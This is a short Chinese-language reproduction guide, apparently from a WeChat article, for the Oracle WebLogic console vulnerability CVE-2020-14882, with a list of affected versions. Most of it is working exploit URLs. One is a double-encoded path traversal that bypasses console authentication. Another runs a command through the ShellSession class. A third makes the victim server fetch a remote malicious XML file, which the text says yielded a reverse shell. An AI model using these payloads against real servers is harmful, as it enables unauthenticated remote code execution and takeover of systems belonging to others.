> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/CkyFuVk5ihd9UAWZKGthSw)  (CVE-2020-14882) **前言:** Weblogic 是美国 Oracle 公司出品的一个 Application Server,确切的说是一个基于 JavaEE 架构的中间件,Weblogic 是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。 **漏洞描述:** 存在于 Oracle Fusion Middleware(组件:控制台)的 Oracle WebLogic Server 产品中的漏洞。利用该漏洞,远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Console 执行任意代码。 **漏洞复现 (****Weblogic 12 版本)****:** 首先看一下是否存在未授权访问漏洞。 访问如下 url ``` http://ip:7001/console/css/%252e%252e%252fconsole.portal ```  执行命令, 创建一个文件。 ``` http://ip:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27touch /tmp/gem%27);%22); ```  创建成功。  构建恶意 xml,部署本地 web 服务上,迫使受害机下载执行嵌入在 xml 文件中的命令。 ``` http://ip:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://ip/shell.xml%22) ```  反弹成功。   **影响版本:**
Weblogic | 10.3.6.0.0 版本 |
Weblogic | 12.1.3.0.0 版本 |
Weblogic | 12.2.1.3.0 版本 |
Weblogic | 12.2.1.4.0 版本 |
Weblogic | 14.1.1.0.0 版本 |